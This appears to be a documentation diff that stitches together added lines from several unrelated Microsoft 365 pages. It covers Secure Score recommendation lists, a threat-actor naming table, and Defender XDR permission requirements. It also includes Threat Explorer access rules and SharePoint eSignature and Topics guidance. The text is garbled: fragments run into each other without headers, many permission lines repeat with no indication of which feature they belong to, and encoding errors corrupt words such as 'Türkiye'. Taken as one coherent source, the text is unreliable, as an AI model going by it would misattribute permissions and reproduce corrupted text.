+- Ensure internal phishing protection for Forms is enabled.

+

+**Microsoft Share Point:**

+- Ensure that SharePoint guest users cannot share items they don't own.

+## December 2023

+The following recommendations have been added as Microsoft Secure Score improvement actions:

+**Microsoft Entra (AAD):**

+- Ensure 'Microsoft Azure Management' is limited to administrative roles.

+**Microsoft Sway:**

+- Ensure that Sways cannot be shared with people outside of your organization.

+**Microsoft Exchange Online:**

+- Ensure users installing Outlook add-ins is not allowed.

+**Zendesk:**

+- Enable and adopt two-factor authentication (2FA).

+- Send a notification on password change for admins, agents, and end users.

+- Enable IP restrictions.

+- Block customers to bypass IP restrictions.

+- Admins and agents can use the Zendesk Support mobile app.

+- Enable Zendesk authentication.

+- Enable session timeout for users.

+- Block account assumption.

+- Block admins to set passwords.

+- Automatic redaction.

+**Net Document:**

+- Adopt Single sign on (SSO) in netDocument.

+**Meta Workplace:**

+- Adopt Single sign on (SSO) in Workplace by Meta.

+**Dropbox:**

+- Enable web session timeout for web users.

+**Atlassian:**

+- Enable multi-factor authentication (MFA).

+- Enable Single Sign On (SSO).

+- Enable strong Password Policies.

+- Enable session timeout for web users.

+- Enable Password expiration policies.

+- Atlassian mobile app security - Users that are affected by policies.

+- Atlassian mobile app security - App data protection.

+- Atlassian mobile app security - App access requirement.

+**Microsoft Defender for Identity:

+New Active Directory Certificate Services (ADCS) related recommendations:**

+- **Certificate templates recommended actions** :

+ - [Prevent users to request a certificate valid for arbitrary users based on the certificate template (ESC1)](/defender-for-identity/security-assessment-prevent-users-request-certificate)

+ - [Edit overly permissive Certificate Template with privileged EKU (Any purpose EKU or No EKU) (ESC2)](/defender-for-identity/security-assessment-edit-overly-permissive-template)

+ - [Misconfigured enrollment agent certificate template (ESC3)](/defender-for-identity/security-assessment-edit-misconfigured-enrollment-agent)

+ - [Edit misconfigured certificate templates ACL (ESC4)](/defender-for-identity/security-assessment-edit-misconfigured-acl)

+ - [Edit misconfigured certificate templates owner](/defender-for-identity/security-assessment-edit-misconfigured-owner)

+- **Certificate authority recommended actions** :

+ - [Edit vulnerable Certificate Authority setting](/defender-for-identity/security-assessment-edit-vulnerable-ca-setting)

+ - [Edit misconfigured Certificate Authority ACL (ESC7)](/defender-for-identity/security-assessment-edit-misconfigured-ca-acl)

+ - [Enforce encryption for RPC certificate enrollment interface (ESC8)](/defender-for-identity/security-assessment-enforce-encryption-rpc)

+For more information, see [Microsoft Defender for Identity's security posture assessments](/defender-for-identity/security-assessment).

+## October 2023:

+The following recommendations have been added as Microsoft Secure Score improvement actions:

+**Microsoft Entra (AAD):**

+- Ensure 'Phishing-resistant MFA strength' is required for administrators.

+- Ensure custom banned passwords lists are used.

+**Microsoft Sway:**

+- Ensure that Sways cannot be shared with people outside of your organization.

+**Atlassian:**

+- Enable multi-factor authentication (MFA).

+- Enable Single Sign On (SSO).

+- Enable strong Password Policies.

+- Enable session timeout for web users.

+- Enable Password expiration policies.

+- Atlassian mobile app security - Users that are affected by policies.

+- Atlassian mobile app security - App data protection.

+- Atlassian mobile app security - App access requirement.

+## September 2023:

+The following recommendations have been added as Microsoft Secure Score improvement actions:

+**Microsoft Information Protection:**

+- Ensure Microsoft 365 audit log search is enabled.

+- Ensure DLP policies are enabled for Microsoft Teams.

+**Exchange Online:**

+- Ensure that SPF records are published for all Exchange Domains.

+- Ensure modern authentication for Exchange Online is enabled.

+- Ensure MailTips are enabled for end users.

+- Ensure mailbox auditing for all users is enabled.

+- Ensure additional storage providers are restricted in Outlook on the web.

+**Microsoft Defender for Cloud Apps:**

+- Ensure Microsoft Defender for Cloud Apps is enabled.

+**Microsoft Defender for Office:**

+- Ensure Exchange Online Spam Policies are set to notify administrators.

+- Ensure all forms of mail forwarding are blocked and/or disabled.

+- Ensure Safe Links for Office Applications is enabled.

+- Ensure Safe Attachments policy is enabled.

+- Ensure that an anti-phishing policy has been created.

+|Threat actor name|Previous name|Origin/Threat|Other names|

+|Aqua Blizzard|ACTINIUM|Russia|UNC530, Primitive Bear, Gamaredon|

+|Blue Tsunami||Private sector offensive actor|Black Cube|

+|Brass Typhoon|BARIUM|China|APT41|

+|Cadet Blizzard|DEV-0586|Russia||

+|Camouflage Tempest|TAAL|Financially motivated|FIN6, Skeleton Spider|

+|Canvas Cyclone|BISMUTH|Vietnam|APT32, OceanLotus|

+|Caramel Tsunami|SOURGUM|Private sector offensive actor|Candiru|

+|Carmine Tsunami|DEV-0196|Private sector offensive actor|QuaDream|

+|Charcoal Typhoon|CHROMIUM|China|ControlX|

+|Cinnamon Tempest|DEV-0401|Financially motivated|Emperor Dragonfly, Bronze Starlight|

+|Circle Typhoon|DEV-0322|China||

+|Citrine Sleet|DEV-0139, DEV-1222|North Korea|AppleJeus, Labyrinth Chollima, UNC4736|

+|Cotton Sandstorm|DEV-0198 (NEPTUNIUM)|Iran|Vice Leaker|

+|Crimson Sandstorm|CURIUM|Iran|TA456, Tortoise Shell|

+|Cuboid Sandstorm|DEV-0228|Iran||

+|Denim Tsunami|KNOTWEED|Private sector offensive actor|DSIRF|

+|Diamond Sleet|ZINC|North Korea|Labyrinth Chollima, Lazarus|

+|Emerald Sleet|THALLIUM|North Korea|Kimsuky, Velvet Chollima|

+|Flax Typhoon|Storm-0919|China|Ethereal Panda|

+|Forest Blizzard|STRONTIUM|Russia|APT28, Fancy Bear|

+|Ghost Blizzard|BROMINE|Russia|Energetic Bear, Crouching Yeti|

+|Gingham Typhoon|GADOLINIUM|China|APT40, Leviathan, TEMP.Periscope, Kryptonite Panda|

+|Granite Typhoon|GALLIUM|China||

+|Gray Sandstorm|DEV-0343|Iran||

+|Hazel Sandstorm|EUROPIUM|Iran|Cobalt Gypsy, APT34, OilRig|

+|Jade Sleet|Storm-0954|North Korea|TraderTraitor, UNC4899|

+|Lace Tempest|DEV-0950|Financially motivated|FIN11, TA505|

+|Lemon Sandstorm|RUBIDIUM|Iran|Fox Kitten, UNC757, PioneerKitten|

+|Lilac Typhoon|DEV-0234|China||

+|Manatee Tempest|DEV-0243|Financially motivated|EvilCorp, UNC2165, Indrik Spider|

+|Mango Sandstorm|MERCURY|Iran|MuddyWater, SeedWorm, Static Kitten, TEMP.Zagros|

+|Marbled Dust|SILICON|T├╝rkiye|Sea Turtle|

+|Marigold Sandstorm|DEV-0500|Iran|Moses Staff|

+|Midnight Blizzard|NOBELIUM|Russia|APT29, Cozy Bear|

+|Mint Sandstorm|PHOSPHORUS|Iran|APT35, Charming Kitten|

+|Mulberry Typhoon|MANGANESE|China|APT5, Keyhole Panda, TABCTENG|

+|Mustard Tempest|DEV-0206|Financially motivated|Purple Vallhund|

+|Night Tsunami|DEV-0336|Private sector offensive actor|NSO Group|

+|Nylon Typhoon|NICKEL|China|ke3chang, APT15, Vixen Panda|

+|Octo Tempest|Storm-0875|Financially motivated|0ktapus, Scattered Spider, UNC3944|

+|Onyx Sleet|PLUTONIUM|North Korea|Silent Chollima, Andariel, DarkSeoul|

+|Opal Sleet|OSMIUM|North Korea|Konni|

+|Peach Sandstorm|HOLMIUM|Iran|APT33, Refined Kitten|

+|Pearl Sleet|DEV-0215 (LAWRENCIUM)|North Korea||

+|Periwinkle Tempest|DEV-0193|Financially motivated|Wizard Spider, UNC2053|

+|Phlox Tempest|DEV-0796|Financially motivated|ClickPirate, Chrome Loader, Choziosi loader|

+|Pink Sandstorm|AMERICIUM|Iran|Agrius, Deadwood, BlackShadow, SharpBoys|

+|Pistachio Tempest|DEV-0237|Financially motivated|FIN12|

+|Plaid Rain|POLONIUM|Lebanon||

+|Pumpkin Sandstorm|DEV-0146|Iran|ZeroCleare|

+|Raspberry Typhoon|RADIUM|China|APT30, LotusBlossom|

+|Ruby Sleet|CERIUM|North Korea||

+|Sangria Tempest|ELBRUS|Financially motivated|Carbon Spider, FIN7|

+|Sapphire Sleet|COPERNICIUM|North Korea|Genie Spider, BlueNoroff|

+|Seashell Blizzard|IRIDIUM|Russia|Sandworm|

+|Secret Blizzard|KRYPTON|Russia|Venomous Bear, Turla, Snake|

+|Silk Typhoon|HAFNIUM|China||

+|Smoke Sandstorm|BOHRIUM|Iran||

+|Spandex Tempest|CHIMBORAZO|Financially motivated|TA505|

+|Star Blizzard|SEABORGIUM|Russia|Callisto, Reuse Team|

+|Storm-0062|DEV-0062|China|DarkShadow, Oro0lxy|

+|Storm-0133|DEV-0133|Iran|LYCEUM, HEXANE|

+|Storm-0216|DEV-0216|Financially motivated|Twisted Spider, UNC2198|

+|Storm-0257|DEV-0257|Group in development|UNC1151|

+|Storm-0324|DEV-0324|Financially motivated|TA543, Sagrid|

+|Storm-0381|DEV-0381|Financially motivated||

+|Storm-0530|DEV-0530|North Korea|H0lyGh0st|

+|Storm-0539||Financially motivated||

+|Storm-0558||China||

+|Storm-0569|DEV-0569|Financially motivated||

+|Storm-0587|DEV-0587|Russia|SaintBot, Saint Bear, TA471|

+|Storm-0744|DEV-0744|Financially motivated||

+|Storm-0829|DEV-0829|Group in development|Nwgen Team|

+|Storm-0835||Group in development|EvilProxy|

+|Storm-0867|DEV-0867|Egypt|Caffeine|

+|Storm-0971|DEV-0971|Financially motivated|(Merged into Octo Tempest)|

+|Storm-0978|DEV-0978|Group in development|RomCom, Underground Team|

+|Storm-1044|DEV-1044|Financially motivated|Danabot|

+|Storm-1084|DEV-1084|Iran|DarkBit|

+|Storm-1099||Russia||

+|Storm-1101|DEV-1101|Group in development|NakedPages|

+|Storm-1113|DEV-1113|Financially motivated||

+|Storm-1133||Palestinian Authority||

+|Storm-1152||Financially motivated||

+|Storm-1167|DEV-1167|Indonesia||

+|Storm-1283||Group in development||

+|Storm-1286||Group in development||

+|Storm-1295|DEV-1295|Group in development|Greatness|

+|Storm-1567||Financially motivated|Akira|

+|Storm-1575||Group in development|Dadsec|

+|Storm-1674||Financially motivated||

+|Strawberry Tempest|DEV-0537|Financially motivated|LAPSUS$|

+|Sunglow Blizzard|DEV-0665|Russia||

+|Tomato Tempest|SPURR|Financially motivated|Vatet|

+|Vanilla Tempest|DEV-0832|Financially motivated||

+|Velvet Tempest|DEV-0504|Financially motivated||

+|Violet Typhoon|ZIRCONIUM|China|APT31|

+|[Volt Typhoon](https://www.microsoft.com/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques)||China|BRONZE SILHOUETTE, VANGUARD PANDA|

+|Wine Tempest|PARINACOTA|Financially motivated|Wadhrama|

+|Wisteria Tsunami|DEV-0605|Private sector offensive actor|CyberRoot|

+|Zigzag Hail|DUBNIUM|South Korea|Dark Hotel, Tapaoux|

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations\Security data\Alerts (manage)** and **Security operations\Security data\ Security data basics (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ Currently, [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) isn't supported.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations \ Security data \ Security data basics (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Raw data (email & collaboration)/Email message headers (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+> [!IMPORTANT]

+> Previewing and downloading emails requires a special role called **Preview**. You can assign this role in the following locations:

+>

+> - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Raw data (email & collaboration)/Email content (read)**.

+> - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Data Investigator** or **eDiscovery Manager** role groups. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) and add the **Preview** role to it.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/Read and manage** or **Authorization and settings/System settings/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security Data / email quarantine (manage)** (management via PowerShell).

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)**.

+In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration**, and then choose **Explorer** _or_ **Real-time detections**. To go directly to the page, use <https://security.microsoft.com/threatexplorer> or <https://security.microsoft.com/realtimereports>.

+- _Real-time detections_ is a reporting tool available in Defender for Office 365 Plan 1. _Threat Explorer_ is a threat hunting and remediation tool available in Defender for Office 365 Plan 2.

+- An **All email** view is available in Threat Explorer, but not included in the Real-time detections report.

+- **All email**: Shows all email analyzed by Defender for office 365 and contains both good and malicious emails. This feature is only present in Threat Explorer and isn't available for Real-time detections. By default, it's set to show data for two days, which can be expanded up to 30 days. This is also the default view for Threat Explorer.

+- **Malware view**: Shows emails on which a malware threat was identified. This is the default view for Real-time detections, and shows data for two days (can be expanded to 30 days).

+- **Phish view**: Shows emails on which a phish threat was identified.

+- **Content malware view**: Shows malicious detections identified in files shared through OneDrive, SharePoint, or Teams.

+ > You can toggle between the **Chart view** and the **List view** to maximize your result set.

+ - From Threat Explorer, you can trigger remediation actions like **Delete an email**. For more information on remediation, remediation limits, and tracking remediation see [Remediate malicious email](remediate-malicious-email-delivered-office-365.md).

+In addition to these features, you'll also get updated experiences like **Top URLs**, **Top clicks**, **Top targeted users**, and **Email origin**. **Top URLs**, **Top clicks**, and **Top targeted users** can be further filtered based on the filter that you apply within Explorer.

+You need [Microsoft Defender for Office 365](defender-for-office-365.md) to use either of Explorer or Real-time detections (included in your subscription or purchased as an add-on):

+To view and use Explorer or Real-time detections, you need to be assigned permissions. You have the following options:

+- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell):

+ - _Read access for email and Teams message headers_: **Security operations/Raw data (email & collaboration)/Email message headers (read)**.

+ - _Preview and download email messages_: **Security operations/Raw data (email & collaboration)/Email content (read)**.

+ - _Remediate malicious email_: **Security operations/Security data/Email advanced actions (manage)**.

+- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):

+ - _Full access_: Membership in the **Organization Management** or **Security Administrator** role groups.

+ - _Preview and download messages_: Membership in the **Preview** role group.

+ - _Read-only access_: Membership in the **Security Reader** role group.

+- [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):

+ - _Full access_: Membership in the **Organization Management** or **Compliance Management** role groups.

+ - _Read-only access_: Membership in the **View-Only Organization Management** or **View-Only Recipients** role groups.

+- [Microsoft Entra permissions](/microsoft-365/admin/add-users/about-admin-roles): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.

+- You need to be assigned permissions before you can do the procedures in this article. Admins can take the required action on email messages, but the **Search and Purge** role is required to get those actions approved. To assign the **Search and Purge** role, you have the following options:

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Email advanced actions (manage)**.

+ - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** or **Data Investigator** role groups. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) and add the **Search and Purge** role to it.

+- Verify **Automated Investigation** is turned on at <https://security.microsoft.com/securitysettings/endpoints/integration>.

+- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Security operations/Security data/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Authorization and settings/System settings/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Authorization and settings/Security settings/Read-only**.

+ - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Authorization and settings/System settings/Read-only**.

+description: Learn how to troubleshoot issues with sending, receiving, or viewing requests in Microsoft SharePoint eSignature.

+### Default program for PDF viewing

+The PDF viewer is opened by selecting a PDF file from SharePoint Online. The ability to use the **Get signatures** option won't be available if the PDF is viewed in any other way, for example, in Microsoft Edge or Adobe Reader.

+As you read content stored in select Microsoft 365 experiences, such as SharePoint, topics will be highlighted inline. When you hover over the topic name, youΓÇÖll see more information shown in a topic card. You might see a prompt to provide feedback on topic cards and topic pages. When you give feedback on topics, you improve the experience for yourself and others.

+>[!NOTE]

+>Inline highlights aren't available for all Microsoft 365 experiences. You won't currently see inline highlights in Teams.

+Knowledge managers can choose to [remove topics](./manage-topics.md) so that users can no longer see them. On the **Manage topics** page in the topic center, knowledge managers can choose to remove specific topics to prevent them from being viewed. Topics can be removed regardless of if they are in a suggested, confirmed, or published state.

+4. Select **Publish** to save your changes. After you publish the page, the topic name, alternate name description, and pinned people will display to users who can view the topic. Specific files, pages, and sites will only appear on the topic page, if the viewer has access to them.

+- Suggested or Confirmed people: People suggested by AI or added to the topic by a person

+- Suggested or Confirmed resources: Files, pages, or sites either suggested by AI or added to the topic by a person.

+>[!NOTE]

+>Users need to have edit permissions to make edits to topic pages.

+To work on the **Manage topics** page of the topic center, you need to have permissions to manage topics. Your admin can assign these permissions to users during [Topics setup](set-up-topic-experiences.md), or new users can be [added afterwards](manage-topic-visibility.md) by an admin through the Microsoft 365 admin center.

+On the **Manage topics** page, the topic dashboard shows all the topics, you have access to that were identified from the source locations specified when you set up Topics. Each topic will show the date the topic was discovered. A user who was assigned Manage topics permissions can review the unconfirmed topics and choose to:

+- Confirm the topic: Indicates to users that an AI-suggested topic has been validated by a human as a relevant topic for the organization.

+- Publish the topic: Edit the topic information to improve the quality of the topic that was initially identified, and enable all Topics users in the organization to access the topic. Note that users will only see content on the topic that their permissions give them access to.

+- Remove the topic: Makes the topic undiscoverable to end users. The topic is moved to the **Removed** tab and can be confirmed later if needed. Note that removing a topic doesn't delete it.

+- [Edit existing topics](edit-a-topic.md): You can make changes to existing topic pages that were created through discovery or created by other users.

+Setting up Topics does not modify any existing access controls on content in your organization. Users can only see what they already have access to.

+>[!NOTE]

+>Users might not see everything that the previously mentioned settings allow them to. [Topic scores](manage-topics.md#topic-scores) and [topic status](manage-topics.md#topic-status) also determine what users see.

+- Have permissions to [view topics](manage-topic-visibility.md#change-who-can-see-topics-in-your-organization), [or create, contribute to, or manage topics](topic-experiences-user-permissions.md).

+These two things give users view access to the topic center and allow them to see topic experiences in Microsoft 365.

+[Topics](topic-experiences-overview.md) helps organizations make knowledge and expertise accessible to all employees. ItΓÇÖs like Wikipedia for organizations, but [artificial intelligence (AI) develops the first draft](topic-experiences-discovery-curation.md) and subject matter experts edit the information to add their unique knowledge. Topics then makes the knowledge available to colleagues and leaders at the time of need, and in the flow of their work. In this article we review how to:

+When the context is appropriate, Topics will suggest topics to be highlighted on all modern SharePoint site pages in a tenant. The topic can also be directly referenced on the modern SharePoint site page by a page author using a hashtag. Page authors can invoke the topic picker on a modern SharePoint page by adding a hashtag and then selecting the topic theyΓÇÖd like to include on the page. Published topics appear for all page viewers, whereas Suggested and Confirmed topics only appear for viewers who have access to one of the topic's resources.

+When a user wants to learn more about a topic, they can select the highlighted topic to view a **topic summary card** that provides a short description. And if they want to learn more, they can select the **Topic details** link in the summary to open the detailed topic page. Any edits made to the topic, along with appearances in the people and suggested files and pages properties of the topic, are properly attributed to the author.

+ **Suggested connections** - You will see topics listed under ***We've listed you on these topics. Did we get it right?*** These are topics in which a userΓÇÖs connection to the topic has been suggested through AI based on contributions made to related files or sites. The user is asked to confirm whether they should stay listed as a related person for the topic. By responding to the confirmation request, the user is making Topics better for themselves and the organization as a whole.

+ **Confirmed connections** - These are topics that users have pinned on the topic page or confirmed as a suggested connection to the topic. Topics will move from the suggested to confirmed section when they confirm a suggested connection.

+3. **Search**: If there's a specific topic to edit, the user can [search for it using Microsoft Search](search.md). If there's no existing topic in the tenant, a new topic can be created.

+The properties are identified from the files and pages that are part of the evidence the AI gathered for identifying the topic. Alternate names and acronyms are sourced from these files and pages. The short description is sourced from these files and pages, or from the internet through Wikipedia. The source file, page, or Wikipedia article is referenced alongside the suggested properties. People are suggested based on their active contributions (for example, edits) to the files and pages. A reference to the number of contributions from a particular person provides a hint as to why the person has been identified. Files, pages, and sites are ranked based on whether they're central to the topic, or whether they can give an overview or introduction to the topic.

+> [!NOTE]

+> While information in a topic that is gathered by AI isΓÇ»[security trimmed](topic-experiences-security-trimming.md), the topic name, alternate names, description, and confirmed people added or updated when editing an existing topic are visible to all users with permissions to view Topics.

+To make contributions to Topics inclusive and helpful, keep in mind:

+- Contributions should avoid acronyms or other ΓÇ£insiderΓÇ¥ terms.

+- Contributions should distinguish between facts and opinion.

+- Contributions should contain upΓÇötoΓÇödate information.

+- Contributions should be accurate, relevant, reliable, and reusable.

+- Contributions shouldn't contain confidential information that is not intended for broad distribution.

+The appropriate web parts to use on a topic page will be based on the scenarios identified for Topics. The [Topics scenario catalog](https://aka.ms/TopicsScenarios) can be referenced for some ideas. To help users think about different ways to make a topic page relevant to a scenario, consider sharing these sample scenarios and associated web parts that have been used on a topic page. Users can choose what makes the most sense and be creative.

+Help employees learn about company products with easy access to product details, announcements, roadmaps, and a place to ask questions.

+Help sales executives, account managers, and support reps serve customers in a more effective manner by providing easy access to customer information.

+Users need the **Who can create or edit topics permissions** link to be able to edit and create new topics. If colleagues are unable to edit or create topics, they can reach out to the admin to have the appropriate [permissions assigned](topic-experiences-user-permissions.md).